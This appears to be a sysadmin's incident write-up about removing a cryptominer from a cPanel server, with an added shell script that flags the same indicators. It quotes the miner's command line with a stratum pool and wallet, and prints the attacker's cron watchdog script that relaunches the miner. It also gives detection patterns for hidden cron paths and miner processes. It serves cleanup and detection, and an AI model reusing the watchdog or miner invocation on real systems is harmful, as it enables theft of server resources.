Recently one of the servers under my control was infected with mining software. It caused unnecessary load and wasted server resources.
Since the server uses cPanel, I had to use WHM to track down the source. I checked WHM ‘Process Manager’ and ‘Daily Process Log’ and found something similar to:
impxxxx impxxxxketing.com 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u 4AmprS3UsK28LE9pHnt9TXDZygXoVtnQ6eFkD5ghP7TwPZ7tKkhQJn1Z3SUCbmw7xcA8F6pnQBpEzfQ2BGdTXo6BEs7MFHZ -p x
I used ‘Process Manager’ to kill the PID that was running the process.
I checked the user’s cPanel and found a strange cron job pointing to a strange path, e.g.:
/home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
So I read the contents of the file using the cat command:
[root@svr2 ~]# cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
#!/bin/sh
if test -r /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid; then
    pid=$(cat /home/impxxxx/public_html/nrxxxxment/includes/.qts/bash.pid)
    if $(kill -CHLD $pid >/dev/null 2>&1)
    then
        exit 0
    fi
fi
cd /home/impxxxx/public_html/nrxxxxment/includes/.qts
./r &>/dev/null
Then I went into the folder to see what was inside:
[root@svr2 ~]# cd /home/impxxxx/public_html/nrxxxxment/includes/.qts/
[root@svr2 .qts]# ls
a bash.pid cron.d dir.dir f g m p r s t upd x
The existence of bash.pid confirms that the mining came from that path.
Deleting the folder and the cron job stops the mining.
[root@svr2 .qts]# cd ..
[root@svr2 includes]# rm -rfv .qts
removed ‘.qts/f’
removed ‘.qts/x’
removed ‘.qts/cron.d’
removed ‘.qts/t’
removed ‘.qts/s’
removed ‘.qts/p’
removed ‘.qts/dir.dir’
removed ‘.qts/bash.pid’
removed ‘.qts/a’
removed ‘.qts/upd’
removed ‘.qts/g’
removed ‘.qts/m’
removed ‘.qts/r’
removed directory: ‘.qts’
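The two indicators this write-up relied on (a cron entry pointing into a hidden directory under public_html, and a process whose arguments carry a stratum pool URL or the cryptonight algorithm flag) can be checked on every account instead of one at a time. The script below is an added example, not part of the original post; the cron and process lines in it are constructed samples, and WALLET stands in for the real address.

```shell
#!/bin/sh
# Added example (not from the original post): flag the indicators seen in the
# write-up. Sample input is constructed; on a live box feed in real output:
#   crontab -l -u "$user" | flag_cron_lines
#   ps axo user,pid,pcpu,args | flag_miner_procs

# Print cron lines whose command path contains a dot-directory below public_html.
flag_cron_lines() {
    grep -E 'public_html/.*/\.[A-Za-z0-9_-]+/'
}

# Print process lines that look like a miner: stratum+tcp pool or "-a cryptonight".
flag_miner_procs() {
    grep -E -i 'stratum\+tcp://|-a[[:space:]]+cryptonight'
}

# Constructed samples: one suspicious and one benign line each.
SAMPLE_CRON='*/5 * * * * /home/impxxxx/public_html/nrxxxxment/includes/.qts/upd
0 2 * * * /usr/local/bin/backup.sh'

SAMPLE_PS='impxxxx 12345 98.5 -bash -a cryptonight -o stratum+tcp://xx.xx.xx.xx:14444 -u WALLET -p x
root 1 0.0 /sbin/init'

# Counts of flagged lines for the samples above (tr strips wc padding on some systems).
count_flagged_cron() {
    printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines | wc -l | tr -d ' '
}
count_flagged_procs() {
    printf '%s\n' "$SAMPLE_PS" | flag_miner_procs | wc -l | tr -d ' '
}

# Stand-alone run: print the flagged samples.
printf '%s\n' "$SAMPLE_CRON" | flag_cron_lines
printf '%s\n' "$SAMPLE_PS" | flag_miner_procs
```

A hidden directory under a web root is unusual for legitimate cron jobs, so any hit from flag_cron_lines deserves the same cat and ls inspection shown above before removal.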